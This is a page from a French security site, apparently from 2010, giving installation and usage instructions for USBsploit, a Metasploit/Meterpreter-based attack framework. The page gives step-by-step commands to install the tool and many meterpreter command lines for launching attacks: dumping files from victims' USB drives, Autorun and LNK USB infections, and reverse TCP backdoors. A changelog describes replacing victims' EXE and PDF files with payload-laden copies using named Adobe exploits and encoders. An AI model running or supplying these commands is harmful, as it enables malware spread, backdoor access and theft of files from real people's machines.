Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- réseau


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Buffalo Technology et Axis Communications lancent un NAS dédié vidéosurveillance la TeraStation 5200 NVR
- Pure Storage positionné comme leader dans le premier Magic Quadrant de Gartner dédié aux SSA
- Verisign Internet atteint 276 millions de noms de domaine au cours du premier trimestre 2014
- Avertissement pour le Crédit Agricole Consumer Finance en raison de dysfonctionnements relatifs au FICP
- La médecine est entrée dans l ère du big data
- Big Data l ambition est là, les résultats manquent à l appel
- Deloitte France et la société de conseil en ingénierie sociale Axcess annoncent leur rapprochement
- Extreme Networks renforce son programme avec ses partenaires
- Ce que les Chinois ont en tête en cherchant à voler des millions de dossiers médicaux occidentaux
- Du Big data aux algorithmes prédictifs la révolution sociétale est en marche
- Le Big Data révolutionne le commerce
- Petit point sur Bitcoin et les cryptomonnaies
- Vigilance - QEMU déni de service via vmstate_xhci_event, analysé le 27 08 2014
- Vigilance - NetBSD multiples vulnérabilités de COMPAT_, analysé le 27 08 2014
- Vigilance - NetBSD déni de service via modctl, analysé le 27 08 2014

Dernier articles de SecuObs :
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles
- #LPM2013: Un nouvel espoir ?
- L'ANSSI durcit le ton

Revue de presse internationale :
- From the Forums Simple Thermometer on Pro Mini
- BrowsePro
- I Love To Code
- Drop Science A track by Matthew Dear created from recordings of GE machines MusicMonday Manufacturing Monday
- Wild Wild West Coupon
- Savuerone
- NASA prepares for serious sysadmin work reimaging Opportunity Rover out on MARS
- ISP Alliance Accepts Piracy Crackdown, With Limits
- Aluminum Cans Delightfully Transformed into Pop Culture Icons
- RocketCoupon
- Cinem4s
- SharkManCoupon
- ExtraShopper
- Hacker Disrupts New Zealand Election Campaign
- From the Forums Trinket weather sensors, incorporating anemometer, wind vane, and rain gauge

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Infratech - vulnérabilité] Déni de Service sur hcidump
- ZMap scanne l'internet en 44 minutes et trouve 2,56 millions de cibles UPnP
- USBDumper 2 nouvelle version nouvelles fonctions !
- Mises à jour en perspective pour le système Vigik
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- WPA Cracker un cluster en ligne de 400 CPU et un dictionnaire de 135 millions d'entrées pour casser, ou pas, WPA/WPA2-PSK en 20 minutes
- [Trames et paquets de données avec Scapy – Partie 1] Présentation
- Les russes ont-ils pwn le système AEGIS ?
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- Sipvicious, un outil d’audit pour SIP

Top bi-hebdo de la revue de presse
- How To Encrypt a Windows Drive with DiskCryptor
- Raw Stack Dump of all threads part 4
- Unexported SSDT functions finding method

Top bi-hebdo de l'annuaire des videos
- Comment creer un server botnet!!!!(Réseau de pc zombies)

Top bi-hebdo de la revue Twitter

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

USBsploit

English version with Google Translate

How to install USBsploit 0.3 BETA through SVN, the tar.gz, the .run or to work with the original Metasploit

Par Xavier Poli, secuobs.com
Le 12/10/2010


Résumé : PoC to generate Reverse TCP backdoors, running Autorun or LNK USB infections, but also dumping all USB files remotely on multiple targets at the same time. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET (The Social Engineering Toolkit). The Meterpreter script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework. - Lire l'article



The most recent version of USBsploit is actually the 0.6 BETA

Reports the bugs to https://twitter.com/secuobs or xavier.poli@infratech.fr (recommanded for privacy issues), KeyID: 0x3A3D555A, FingerPrint: 04B1 244C CC25 DA93 EB73 EF52 E278 881F 3A3D 555A, xpo.asc

The usbsploit.rb script seems to have some issues if used with the default Ruby version of Backtrack 4, installing a 1.9.1 version will fixed. The details to give in the bugs reports: the version of Python, the version of Ruby, the version of Metasploit if used, the OS of the targets, the OS of the listener, the hardware details for both the targets and the listener but also for the USB drives, the security solutions installed on both the targets and the listener, the particular firewall configuration on both the target and the listener, the version of VMware or others if used, the last file for the Dump configuration, the stage where the bug was identified, the global USBsploit options if changed, the output of the high verbosity scan, the output of USBsploit

To use USBsploit, you certainly need the same dependencies ( link ) as the Metasploit Framework and SET.

Installation 0.3 BETA through SVN ( lien )

root:~# svn -q co https://svn.secuobs.com/svn
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p
root:~# cd svn/
root:~/svn# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root:~/svn# cd ../
root:~# rm -fr svn
root:~# usbsploit


Installation through usbsploit-0.3-BETA-linux-i686.run ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.3-BETA-linux-i686.run
root:~# sha1sum usbsploit-0.3-BETA-linux-i686.run
2a85b5771e457e3f93f1f4fc103d6e6642b21e41 usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# sh usbsploit-0.3-BETA-linux-i686.run
Type usbsploit to launch the USBsploit Framework
root:~# rm -fr usbsploit
root:~# usbsploit
The USBsploit Framework 0.3 BETA
Report bugs to: xavier.poli.fr
Or: http://www.twitter.com/secuobs
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT

- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p


Installation through usbsploit-0.3-BETA-linux-i686.tar.gz ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.3-BETA-linux-i686.tar.gz
2c4761fe51bc19dbbce4ee3f4c1e0b0b2048b222 usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# cd usbsploit
root:~/usbsploit# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root:~/usbsploit# cd ../
root:~# rm -fr usbsploit/
root:~# usbsploit
The USBsploit Framework 0.3 BETA
Report bugs to: xavier.poli.fr
Or: http://www.twitter.com/secuobs
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p


Installation usbsploit.rb 0.3 BETA working with the original Metasploit Framework ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.3-BETA-linux-i686.tar.gz
2c4761fe51bc19dbbce4ee3f4c1e0b0b2048b222 usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# mv usbsploit/lib/msf/scripts/meterpreter/usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/data/textextensions /opt/metasploit3/msf3/data/
root:~# rm -fr usbsploit/
root:~# msfconsole -n

When you have a Meterpreter session:

- Get some help

meterpreter > run usbsploit -h

- Launch a Dump attack on all files with high verbosity and only during one successfull scan with dumped files

meterpreter > run usbsploit -v -w -d

- Launch a Dump attack only on files matching the predefined set of extensions with high verbosity and only during one successfull scan with dumped files

meterpreter > run usbsploit -v -w -e /opt/metasploit3/msf3/data/textextensions -t

- Launch a Dump attack on all files with high verbosity during an infinite loop

meterpreter > run usbsploit -v -d

- Launch a Dump attack only on files matching the predefined set of extensions with high verbosity during an infinite loop

meterpreter > run usbsploit -v -e /opt/metasploit3/msf3/data/textextensions -t

- Launch an Autorun infection attack with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a

- Launch both Autorun infection and all files dumping attacks with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -d

- Launch both Autorun infection and files dumping attacks (only on files matching the predefined set of extensions) with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -e /opt/metasploit3/msf3/data/textextensions -t

- Launch an Autorun infection attack with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a

- Launch both Autorun infection and all file dumping attacks with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -d

- Launch both Autorun infection and file dumping (only on files matching the predefined set of extensions) attacks with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -e /opt/metasploit3/msf3/data/textextensions -t

- Launch an LNK infection attack with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l

- Launch both LNK infection and all files dumping attacks with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l -d

- Launch both LNK infection and files dumping attacks (only on files matching the predefined set of extensions) with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l -e /opt/metasploit3/msf3/data/textextensions -t

- Launch an LNK infection attack with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l

- Launch both LNK infection and all file dumping attacks with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l -d

- Launch both LNK infection and file dumping (only on files matching the predefined set of extensions) attacks with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l -e /opt/metasploit3/msf3/data/textextensions -t

Just removed the "-v" switch to desactivate the high verbosity

USBsploit ressources:

- Video - USBsploit 0.6 BETA: Replace and infect all EXE and PDF with payload embedded into the orignal files
- Video - USBsploit 0.6 BETA: using autosploit CLI to automate the infection of all original EXE & PDF files
- Video - usbsploit.rb 0.6b w/ MSF: custom infection to replace all the original EXE and PDF files
- Video - usbsploit.rb 0.6b split into 3 scripts w/ MSF: custom infection to replace all original EXE and PDF
- How to install USBsploit 0.6 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced through Railgun against XP HOME
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE files replaced, Railgunonly option against XP PRO
- Video - usbsploit.rb 0.5b with Metasploit: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced using Railgun against XP HOME
- Video - usbsploit.rb 0.5b split into 3 scripts with Metasploit: Migration, Replacement, dump protection and Railgunonly against XP PRO
- How to install USBsploit 0.5 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video: USBsploit 0.4 BETA: Auto[run|play]/PDF USB infection and files dumping through Meterpreter sessions
- Video: usbsploit.rb 0.4 in Metasploit, Auto[run|play]/PDF USB infection and files durmping through Meterpreter
- How to install USBsploit v0.4b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit 0.3 BETA: Auto[run|play]/LNK USB infection and files dumping through Meterpreter sessions
- Video: usbsploit.rb 0.3 in Metasploit, Auto[run|play]/LNK USB infection and files durmping through Meterpreter
- How to install USBsploit v0.3b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit 0.2 BETA: Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: usbsploit.rb 0.2 and the original Metasploit Framework,Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: USBsploit 0.2 BETA: both USB files dumping and Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: usbsploit.rb 0.2 in Metasploit, both Auto[run|play]/EXE USB infection and files durmping through Meterpreter sessions
- How to install USBsploit v0.2b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit gets all the remote USB files through Meterpreter sessions and a modified version of the original Metasploit Framework
- Video: USBsploit gets all the remote USB files filtered by extensions through Meterpreter sessions and a modified version of the original Metasploit Framework
- Video: usbsploit.rb and the original MSF to get all the remote USB files through Meterpreter sessions
- Video: usbploit.rb and the original MSF to get all the remote USB files filtered by extensions through Meterpreter sessions
- How to install USBsploit v0.1b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework

Changelog:

USBsploit V0.6b:

- Add an option for the replacement module, allowing to try to upload an infected version of the original USB files first. Only for PDF and EXE files, LNK ones will always be replaced by a generic malicious one. If not succeeding to infect an embed custom version, a generic malicious one will be used to replace the EXE and PDF files. It can be use alone or with any Auto[run|play] infection but not with a single dump (all or by extension) attack. It's useful when the targets don't have Auto[run|play] activated. Can be used with USBsploit or with the original Metasploit framework via the usbsploit.rb script provided. Also supported into the 3 splited meterpreter scripts (autorun_usbsploit.rb, dump_usbsploit.rb, replace_usbsploit.rb).
- Offer a CLI to automate the creation of the malicious files and the launch of the listeners. The ip, payload, encoder, count, port, attacks, replacing, template for pdf embed and pdf type options can be specified via specific switchs on the command line. If nothing specified for an option, the default value will be used. All the different combinaisons were tested via an intenal fuzzing tools and looks to work.
- offers an internal Metasploit core updated with the last SVN version (metasploit v3.7.0-dev svn r12145 2011.03.26).

USBsploit V0.5b:

- integrates a EXE, PDF and LNK USB replacement module. It can be use alone or with any Auto[run|play] infection but not a single dump (all or by extension) attack. It's useful when the targets don't have Auto[run|play] activated.
- offers an option to use to replace only the contextual files to an Auto[run|play] USB infection. If Auto[run|play]/exe, all the EXE can be replaced, same for Auto[run|play]/pdf PDF files and Auto[run|play]/lnk LNK files.
- now using railgun with with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW() when vmic's not available on the targets (XP HOME).
- an option can be activated to always using railgun with with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW(), even when vmic's available on the targets (XP PRO).
- More than the single usbsploit.rb scripts, now offering 3 independent ruby meterpreter scripts (autorun_usbsploit.rb, dump_usbsploit.rb, replace_usbsploit.rb). Note that dump_usbsploit.rb's an option to protect the dumped files from being overwritten when trying to dump a file previously uploaded by replace_usbsploit.rb or autorun_usbsploit.rb. Every scripts can be used with the last original Metasploit Framework (all the options work with the 3.5.1-dev).
- offers an internal Metasploit core updated with the last SVN version (v3.5.1-dev svn r11223 2010.12.04).
- Add Adobe FlateDecode Stream Predictor 02 Integer Overflow to the list of MSF FileFormat attacks.
- Minor improvements and some bug fixes like when a non default value's specified for the path of the file listing the extension to dump.

USBsploit V0.4b:

- integrates a Auto[run|play]/PDF USB infection module with various attacks (Adobe CoolType SING Table 'uniqueName' Overflow, Adobe Flash Player 'newfunction' Invalid Pointer Use, Adobe Collab.collectEmailInfo Buffer Overflow, Adobe Collab.getIcon Buffer Overflow, Adobe JBIG2Decode Memory Corruption Exploit, Adobe PDF Embedded EXE Social Engineering, Adobe util.printf() Buffer Overflow, Adobe U3D CLODProgressiveMeshDeclaration Array Overrun, Adobe PDF Embedded EXE Social Engineering (NOJS)).
- offers an option to use both the Auto[run|play]/PDF USB infection and the USB files dumping attack on a same target
- offers a ruby meterpreter script (usbsploit.rb) compatible with the last original Metasploit Framework (all the options work with the 3.5.1-dev). A bug (reported to the MSF team) seems to exist with this last version of MSF (not with the previous 3.4.2-dev) when exit -y is used if you have an active session and an InitialAutorunScript was used (finished or not), you need to kill it with sessions -K before exit or exit -y. The USBsploit Framework is always based on the 3.4.2-dev for the moment to avoid this issue.

USBsploit V0.3b:

- was tested under a GNU/Linux operating system with Python 2.6.5 and ruby 1.9.1,
- integrates a Auto[run|play]/LNK USB infection module. The generation of the LNK file, the autorun.inf and the rest of the process are splitted but share some random values to work together
- offers to launch a LNK listener (different from the one handling the USB infection) to get the connect back from the USB drives infected with the last LNK file generated.
- offers also a full console with this listener, including all the Metasploit features, except the exploits, payloads, encoders and nops. You have to add manually this kind of stuffs if you want to use it (copy from a classic Metasploit installation to the lib/msf/modules in the USBsploit installation tree). You can choose to activate the database support or not on this console.
- offers an internal Metasploit core updated with the last SVN version (v3.4.2-dev)
- adds support for the French outputs of the wmic commands
- offers an option to use both the Auto[run|play]/LNK USB infection and the USB files dumping attack on a same target
- offers a ruby meterpreter script (usbsploit.rb) compatible with the last original Metasploit Framework (all the options work with the 3.4.2-dev).

USBsploit V0.2b:

- integrates the Auto[run|play]/EXE USB infection module
- offers an option to use both the Auto[run|play]/EXE infection and files dumping attack on a same target

USBsploit V0.1b:

- was tested under a GNU/Linux operating system with Python 2.6.2 and ruby 1.9.1,
- was tested against a target Microsoft Windows XP PRO SP3 running under a GNU/Linux VMware Server 2.0.2,
- needs the wmic command on the targets (Windows XP home is not a possible target),
- works against multiple targets at the same time and multiple USB keys on each target
- deals the multiple plugs and unplugs for a same key
- can be installed via SVN, ".run" or ".tar.gz" archives,
- can be managed through a Python interface (a modified version of the Social Engineering Toolkit, original by ReL1K),
- can be updated via SVN,
- allows the activation and the desactivation for auto-updates,
- allows to edit global configuration file,
- allows to generate Meterpreter Backdoors with some available options (ip for the listener, type of Backdoor, type of Encoding, port for the Listener, multiple Encoding stages) and choose if a Dump Listener will be launched,
- allows to generate Meterpreter Backdoors with the same kind of options and launching automatically a Dump Listener,
- lets choosing between 3 types of Meterpreter Backdoors available (Reverse_TCP the only one tested for now, Reverse_TCP_X64, Egress Buster),
- lets choosing between 3 types of Encoding for the Meterpreter Backdoors (shikata_ga_nai, Multi-Encoder, Backdoored EGxecutable),
- allows to dump all the files from a remote USB key through multiple Meterpreter sessions and a light version (24MB) of Metasploit (original by HDM),
- allows to dumps, from a remote USB key, all the files matching a specific set of extensions, defined through a text file,
- allows to edit the file for defining the set of extensions,
- allows to launch a Dump Listerner through the last file of Dump configuration,
- allows to edit the last file of Dump configuration,
- allows to activate the high verbose mode,
- allows to choose between only one USB Scan/Dump ending with success for each attack or an infinite loop,
- Ruby script usbsploit.rb compatible with the original Metasploit Framework (all the options work with the version 3.4.x, the anterior versions weren't tested).

The future versions of USBsploit could:

- inject a malicious VBS script into the DOC/XLS files available on the remote USB keys
- target USB U3 keys,
- integrate the ReverseConnectRetries directive for the Reverse_TCP payloads
- integrate the EnableContextEncoding and ContextInformationFile directives for the generation of payloads
- reintegrate some features of SET to spread the malicious files,
- help to build a fake malicious website alimenting a Twitter account with the items from the most popular Press RSS. Karmetasploit, Wepbuster, MITM and ARP poisonning modules could also be added
- Others ???


Les mots clés pour les articles publiés sur SecuObs : usbsploit targz metasploit
Les articles de la revue de presse sur les mots clés : metasploit
Les videos sur SecuObs pour les mots clés : usbsploit metasploit
Les éléments de la revue Twitter pour les mots clés : metasploit
Voir tous les articles de "Xavier Poli" publiés sur SecuObs (350 résultats)
Voir tous les articles publiés par l'organisme "secuobs" sur SecuObs (1000 résultats)


- Article suivant : La gestion des accès et des identités, un des chantiers les plus importants de la sécurité informatique en entreprise
- Article précédent : Video: usbsploit.rb 0.3b with Metasploit, USB LNK infection through Meterpreter and files dumping
- Article suivant dans la catégorie USBsploit : Video - USBsploit 0.4 BETA: USB Auto[run|play]/PDF Infection through Meterpreter, reverse backdoor and files dumping
- Article précédent dans la catégorie USBsploit : Video: usbsploit.rb 0.3b with Metasploit, USB LNK infection through Meterpreter and files dumping



Les derniers articles de la catégorie USBsploit :
- usbsploit_module.rb 0.1: use USBsploit as a module for Metasploit
- usbsploit.rb 0.6b split into 3 scripts w/ MSF: custom infection to replace all original EXE and PDF
- usbsploit.rb 0.6b w/ MSF: custom infection to replace all the original EXE and PDF files
- USBsploit 0.6 BETA: using autosploit CLI to automate the infection of all original EXE & PDF files
- USBsploit 0.6 BETA: Replace and infect all EXE and PDF with payload embedded into the original files
- How to install USBsploit 0.6 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- How to install USBsploit 0.5 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video - usbsploit.rb 0.5b split into 3 scripts with Metasploit: Migration, Replacement, dump protection and Railgunonly against XP PRO
- Video - usbsploit.rb 0.5b with Metasploit: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced using Railgun against XP HOME
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE files replaced, Railgunonly option against XP PRO




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :